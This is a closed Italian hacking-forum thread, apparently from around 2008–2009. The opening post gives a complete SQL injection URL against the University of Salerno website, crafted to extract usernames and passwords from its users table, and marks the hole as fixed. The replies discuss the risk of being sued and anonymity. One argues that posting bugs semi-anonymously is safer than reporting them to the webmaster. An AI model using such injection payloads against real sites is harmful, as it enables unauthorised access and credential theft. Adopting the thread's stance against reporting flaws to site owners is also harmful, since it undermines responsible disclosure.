(SQL Injection Fixed) Università degli Studi di Salerno

Stato
Discussione chiusa ad ulteriori risposte.
Ordina per data Ordina commenti per reazioni
B

BrainStorm

Utente Silver
29 Novembre 2008
46
1
1
62
Discovered By BrainStorm dic 2007
Fixed Feb 2009

Codice: 
http://www.unisa.it/dett_news.php?sid='%20union%20all%20select%20NULL,username,NULL,NULL,NULL,NULL,NULL,password,NULL,5,NULL,NULL,NULL,NULL,NULL,NULL%20from%20users/*
 
complimenti,
ma io ho paura di essere denunciato...
e adesso come adesso non posso permettermi un avvocato
 
kr1pn0$ ha detto:
non sei molto anonimo se lo hai postato nel forum :p
Clicca per espandere...

Wat ?
1) Per risalire a questo topic il web-master dovrebbe fare un ricerca del tipo "nomesito.com bug"
2) Se lo facesse, significa che è preoccupato per la sicurezza di $nomesito
3) Se è preoccupato, si riguarderà il sito, piuttosto che cercare su internet possibili advisories
4) Anche venisse qui, BrainStorm è solo un nickname ; )
 
vir sai meglio di me che l'anonimato è al 99% impossibile del tutto...magari un semplice webmaster non può fare niente ma gente con altri poteri può rintracciarti e come...solo non credo sia questo il caso!
P.s.=presto ci sarà una sorpresina riguardo bug,xss,ecc ecc vero vir?:asd:
 
R4z0r_Cr4$H ha detto:
vir sai meglio di me che l'anonimato è al 99% impossibile del tutto...magari un semplice webmaster non può fare niente ma gente con altri poteri può rintracciarti e come...solo non credo sia questo il caso!
P.s.=presto ci sarà una sorpresina riguardo bug,xss,ecc ecc vero vir?:asd:
Clicca per espandere...

Bè certo, ma io non parlavo solo di anonimato, parlavo anche di una questione di fatto.
Se invii una mail al web master dove denunci il bug e ti offri di aiutare per il fixing, hai più possibilità di essere denuncianto che non quando posti il tutto su un database, semi-anonimo.

E comuqnue sì, presto avremo risolto i vostri problemi, sempre che risolviamo i nostri xD
 
Stato
Discussione chiusa ad ulteriori risposte.
Top Bottom
Indietro